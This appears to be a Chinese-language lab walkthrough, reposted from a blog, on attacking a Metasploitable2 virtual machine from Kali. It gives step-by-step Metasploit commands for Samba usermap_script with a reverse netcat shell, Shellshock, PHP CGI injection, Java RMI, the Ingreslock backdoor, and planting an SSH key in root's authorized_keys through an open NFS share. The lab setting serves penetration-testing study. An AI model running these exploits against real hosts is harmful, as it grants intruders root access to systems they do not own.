系统相关
首页 > 系统相关> > 漏洞利用六:Linux系统漏洞利用

漏洞利用六:Linux系统漏洞利用

作者:互联网

准备:直接用一个工具包,在虚拟机上直接打开Linux环境。此虚拟机为靶机。

账号:msfadmin        密码:msfadmin 

设权限sudo passwd root      改root密码:msfadmin

切换权限:su root      输密码:msfafmin

重启网卡:/etc/init.d/networking restart

xshell连接地址:192.168.1.103(桥接)

一、利用samba 服务漏洞入侵linux主机(samba低版本),对应端口:139、445

靶机IP:192.168.1.103

查看本地服务:netstat -lnt

结合nessus扫描本机的结果出现的漏洞,进行攻击。

攻击机:kali,IP:10.0.0.9

1.msfconsole

search samba

use exploit/multi/samba/usermap_script

set payload cmd/unix/reverse_netcat

show options

set rhosts 192.168.1.103

exploit

成功后可在本地直接输入命令操控对方。

二、CVE-2014-6271       Bash Shellshock(破壳)

        Shellshock的原理是利用了Bash在导入环境变量函数时候的漏洞,启动Bash的时候,它不但会导入这个函数,而且也会把函数定义后面的命令执行。在有些CGI脚本的设计中,数据是通过环境变量来传递的,这样就给了数据提供者利用Shellshock漏洞的机会。简单来说就是由于服务器的cgi脚本调用了bash命令,由于bash版本过低,攻击者把有害数据写入环境变量,传到服务器端,触发服务器运行Bash脚本,完成攻击。cgi格式文件是“公共网关接口脚本”类型文件。

1.准备环境

靶机:metasploitable2(kali)系统,IP:192.168.1.103。

攻击机:kali,IP:10.0.0.9。
2.靶机上面

cd /usr/lib/cgi-bin/

(创建hello.sh文件:)

sudo nano hello.sh

(ctrl+x退出)(用vim对hello.sh脚本进行编辑:vim hello.sh)

#! /bin/bash

echo "Content-type: text/html"

echo ""

echo "Hello world!"

 (:wq保存)

(保存好后,赋予脚本可执行权限,使用chmod命令:)

sudo chmod 755 hello.sh

(通过浏览器访问该脚本,可以看到成功执行,可以攻击)

http://192.168.1.103/cgi-bin/hello.sh

3.进入攻击机msfconsole。

search CVE-2014-6271

use exploit/multi/http/apache_mod_cgi_bash_env_exec

show options

set rhost 192.168.1.103

set targeturi /cgi-bin/hello.sh

exploit 

三、PHP CGI漏洞

1.准备环境

靶机:同上

攻击机kali,IP:10.0.0.9。

2.search cve:2012-1823

use exploit/multi/http/php_cgi_arg_injection

show options

set rhost 192.168.1.103

exploit

四、Java RMI SERVER 命令执行漏洞与java cve-2013-0422

nmap –p 0-65535 IP       #查看1099端口是否开启

use exploit/multi/misc/java_rmi_server

五、Ingreslock  后门

原理:Ingreslock后门监听1524端口,连接1524端口就可以直接提取root权限。

验证:在本地机上   Telnet 192.168.1.103 1524

六、NFS Exported Share Information Disclosure

rpcinfo -p 192.168.1.103                     #显示本地系统中注册到rpcbind协议版本2的所有RPC服务

showmount -e 192.168.1.103               #显示被挂载的共享目录

ssh-keygen                                            #生成密钥

默认密钥保存地址  (/root/.ssh/id_rsa.pub)     

mkdir /tmp/test                                      

mount -t nfs 192.168.1.103:/ /tmp/test

cat /root/.ssh/id_rsa.pub>>/tmp/test/root/.ssh/authorized_keys

ssh root@192.168.1.103

相当于远程连接

标签:cgi,192.168,1.103,利用,exploit,sh,系统漏洞,Linux,root
来源: https://blog.csdn.net/m0_54666999/article/details/120063751